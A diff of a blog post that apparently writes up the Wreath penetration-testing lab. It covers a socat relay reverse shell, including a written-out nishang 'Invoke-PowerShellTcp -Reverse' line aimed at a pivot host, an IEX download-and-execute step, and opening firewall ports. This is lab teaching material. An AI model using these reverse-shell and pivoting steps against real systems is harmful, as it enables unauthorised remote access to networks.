SoumyaEXE/soumya.github.io/_posts/2021-03-30-Wreath-Writeup.markdown

 #### Socat Relay Reverse Shell

-I used a socat reverse shell to demonstrate this, as it is instructive on how networking traffic can be directed:
+I used a socat reverse shell to demonstrate this, as it is instructive on how networking traffic can be directed\:

 1. We are going to set up a listening port on 20001 on the .200 machine and forward all traffic from that port to 20002 on our machine.

 ![](/reports/Wreath/image35.png)

-2. Next, we will set up netcat listening on port 20002 on our system:
+2. Next, we will set up netcat listening on port 20002 on our system\:

 ![](/reports/Wreath/image66.png)

-3. I used the Invoke-PowerShellTcp.ps1 nishang script and added Invoke-PowerShellTcp -Reverse -IPAddress 10.200.111.200 -Port 20001 to the bottom of the script, so that when downloading the script using IEX (more on this later), each line in the script will be automatically executed giving us a reverse shell:
+3. I used the Invoke-PowerShellTcp.ps1 nishang script and added Invoke-PowerShellTcp -Reverse -IPAddress 10.200.111.200 -Port 20001 to the bottom of the script, so that when downloading the script using IEX (more on this later), each line in the script will be automatically executed giving us a reverse shell\:

 ![](/reports/Wreath/image20.png)

 Note how we are sending the reverse shell to .200 on port 20001 (remember all traffic on port 20001 will be directed to our port 20002 on our machine).

 4. Now, the firewall will block inbound connections for any ports that are not specified as exceptions.
-We have to tell the firewall which ports it should allow for connections by using the firewall-cmd command as such:
+We have to tell the firewall which ports it should allow for connections by using the firewall-cmd command as such\:

 ![](/reports/Wreath/image41.png)